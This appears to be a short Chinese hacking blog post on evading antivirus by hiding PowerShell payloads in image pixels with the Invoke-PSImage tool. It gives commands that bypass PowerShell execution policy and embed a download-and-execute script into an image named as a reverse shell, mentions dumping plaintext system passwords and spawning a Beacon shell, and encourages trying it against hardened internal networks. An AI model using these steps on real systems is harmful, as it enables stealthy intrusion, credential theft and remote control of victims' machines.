通过图片免杀执行远程powershell代码

1
2
3
4
https://github.com/klionsec/Invoke-PSImage
C:\>powershell -exec bypass
PS C:\> Import-Module .\Invoke-PSImage.ps1
PS C:\> Invoke-PSImage -Script .\Download-Execute-PS.ps1 -Image .\large.JPG -Out .\reverse_shell.png -Web

免杀抓取系统用户明文密码


免杀弹回一个beacon的shell



后话:
    逛facebook无意看到的,觉得还不错,顺便拿过来跟大家分享下,脚本主要作用就是把payload数据分散存到图片的每个像素中,最后到远端执行时,再重新遍历重组像素中的payload代码来执行,具体看脚本和触发代码即可知,不得不说,思路非常好,哼哼…其实,除了图片能存数据,还有其它很多的地方也都能存,这样也确实有一定的免杀效果,但nod实测时还是会被捕捉到,可能是download时被发现到了,对于一些比较变态的内网环境,大家不妨尝试下,毕竟,无痕执行相对还是比较好的,另外,图片像素务必要大,大到能完整装下你的payload,可继续深度利用的空间还很大,大家不妨自行尝试,废话不多说,祝,好运 ^_^